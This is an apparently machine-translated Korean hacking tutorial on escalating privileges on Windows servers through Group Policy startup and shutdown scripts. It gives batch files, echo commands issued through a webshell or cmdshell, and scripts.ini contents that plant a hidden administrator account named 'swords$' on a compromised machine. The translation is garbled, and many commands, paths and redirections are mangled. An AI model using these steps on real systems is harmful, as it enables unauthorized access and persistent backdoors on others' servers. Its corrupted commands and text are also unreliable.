관리자 권한 증가: 시작 스크립트 방법. 너는 이미' 나는 나 [F.S.T.] 가 아니다' 에 요약된 관리자 권한을 높이는 8 가지 방법을 보았다. 이제 시작 스크립트와 배치를 사용하여 셸을 얻을 수 있는 권한을 높였습니다. 방법 9: 시작 스크립트 방법! ! 첫 번째 유출은 모두 자세히 살펴보아야 한다. 나는 가급적 쓸데없는 말을 하지 않고 간결하게 말하려고 노력한다. 참고 시작 스크립트는 사용자를 로그인하도록 초대하기 전에 실행되는 배치 파일입니다. Win9X 및 DOS 에서 자동 실행 배치 파일 autoexec.bat 처럼 작동합니다. 스크립트는 windows 로그인 전에 실행되므로 뒷문 시작, 관리자 계정 추가, 관리자 계정 수정 등 스크립트 내용을 수정하여 시스템을 설정할 수 있습니다. 네가 어떻게 생각하든 간에. 거짓말 .. 이 글은 먼저 webshell 을 통해 숨겨진 계정을 추가하는 것을 소개하고 (결국 이것은 모두의 가장 큰 관심사:) 그런 다음 문제가 발생한 후의 해결 방법을 설명합니다. 계정을 추가하려면 어떻게 해야 합니까? I. ocean 과 같은 파일을 직접 쓸 수 있다면. (1) 먼저 ocean 을 사용하여 새 관리자를 위한 배치 파일 swords 1.bat 를 다음과 같이 작성했습니다. net 사용자 swords$ content $ nbspeviocts Swords 1.bat 파일을 c: ₩ winnt ₩ system32 ₩ group policy ₩ machine ₩ scripts ₩ startup 에 저장합니다 (참고: c: \ winnt 는 시스템 디렉토리입니다. 시스템 디스크가 CD 가 아닌 경우 그에 따라 시스템 디렉토리로 변경하십시오. 이 컴퓨터를 보면 그룹 정책 \ 컴퓨터 \ 스크립트 \ 시작 폴더를 찾지 못할 수 있습니다. 도구/폴더 옵션/보기/클릭 을 선택하여 모든 파일과 폴더를 표시할 수 있습니다. 만약 FSO 를 사용하여 바다의 모든 서류를 표시한다면, 이 일거수일투족을 할 필요가 없다. (2) 다음 일괄 처리 파일 swords2.bat 삭제 관리자를 작성합니다. 매우 간단합니다. 한 마디로 할 수 있습니다. 네티즌 swords$ Content $ nbsp/del 이 배치 파일은 관리자 이름이 swords $ 인 숨겨진 계정을 삭제합니다 (3) 시작/종료 스크립트 구성 파일 scripts.ini 를 작성합니다 (참고: scripts 는 기본 구성 파일 이름입니다. 그리고) 다음과 같습니다: [startup] 0cmdline = swords1.bat0parameters = [shutdown] 0cmdline = swords2 2. cmdshell 이 있는 경우 echo 권한을 가질 수 있으므로 다음을 추가할 수 있습니다. (1)echo, swords 1.vbs 를 시작할 때 사용한 파일, echo on errs Machine \ scripts \ startup \ swords1.VBS echo net 사용자 칼 $ Content $ nbspEVI octal/add & gt; & & GTC: \ winnt \ system32 \ grouppolicy \ machine \ scripts \ startup \ swords1.vs /add > & gt: \ winnt \ system32 \ grouppolicy \ machine \ scripts \ startup \ swords1.vs (2)echo, swords2.vbs 가 닫힐 때 사용되는 스크립트 파일, echo net 사용자 swords $ Content $ nbsp/del & gt;; C: \ winnt \ system32 \ grouppolicy \ machine \ scripts \ shutdown \ swords2.vbs (3) 시작/쓰기 System32 \ group policy \ machine \ scripts \ scripts.ini echo 0 cmdline = swords1.VBS & & GTC: \ winnt \ system32 \ grouppolicy \ machine \ scripts \ scripts.iniecho0parameters = > & GTC: \ winnt \ system32 \ grouppolicy \ machine \ scripts \ scripts.iniecho [shutdown]> & & GTC: \ winnt \ system32 \ group policy \ machine \ scripts \ scripts.ini echo 0 cmdline = swords2 .. & GTC: \ winnt \ system32 \ grouppolicy \ machine \ scripts \ scripts.iniecho0parameters = > & GTC: \ winnt \ system32 \ grouppolicy \ machine \ scripts \ scripts. ini scripts.ini 파일을 c: \ 마지막으로, 서버가 컴퓨터를 다시 시작하거나 스스로 시작하도록 강요할 때까지 기다립니다 (수단이 많음). 그럼 그냥 놀기를 기다리세요. 참고 이 방법을 사용할 때 서버에 컴퓨터 시작 스크립트가 이미 지정되어 있어야 합니다. 그렇지 않으면 이 방법이 실패할 수 있습니다. 3. 만약 당신이 로컬 컴퓨터이거나 이미 상대방의 3389 를 연결했는데 일반 사용자 권한만 있으면 어떻게 합니까? 컴퓨터 시작/종료 스크립트를 시작하기 전에 할당해야 합니다. 컴퓨터 시작/종료 스크립트를 할당하려면 그룹 정책 MMC (관리 콘솔) 스냅인을 통해 수행해야 합니다. (1) /MMC 시작/실행, Microsoft 콘솔 열기 (2) ctrl+M 을 눌러 스냅인 추가/제거 창을 엽니다 (3) 독립 스냅인 추가 대화 상자에서 그룹 정책을 선택하고 추가 버튼을 클릭합니다. (4) 기본' 로컬 컴퓨터' 그룹 정책 개체 선택/완료/확인/확인 닫기 창. (5) 생성된' 로컬 컴퓨터' 정책에서 컴퓨터 구성 /Windows 설정/스크립트 (시작/종료) 노드를 열고' 시작' 또는' 종료' 항목을 두 번 클릭하여 컴퓨터 시작 또는 종료 시 사용할 스크립트를 설정하고 찾아보기를 클릭하여 시작할 스크립트를 추가합니다 (6) 설정이 완료되면 그룹 정책 MMC 스냅인을 저장하고 종료합니다. 그룹 정책을 새로 고치면 컴퓨터가 시작되고 종료될 때 이러한 스크립트가 적용됩니다. 주: gpedit.msc 를 직접 열고 컴퓨터 구성 /Windows 설정/스크립트 (시작/종료) 를 확장한 다음 시작 스크립트를 추가할 수도 있습니다. 그런 다음 컴퓨터 구성/관리 템플릿/시스템/로그인을 확장하고 시작 스크립트 실행 상태 표시를 켭니다. 재부팅 후 한 번 보고 cmd 를 열고 net user swords$ 를 입력하여 세부 정보를 표시합니다. 꽥꽥, 사용자가 한 명 더 생겼다. (참조)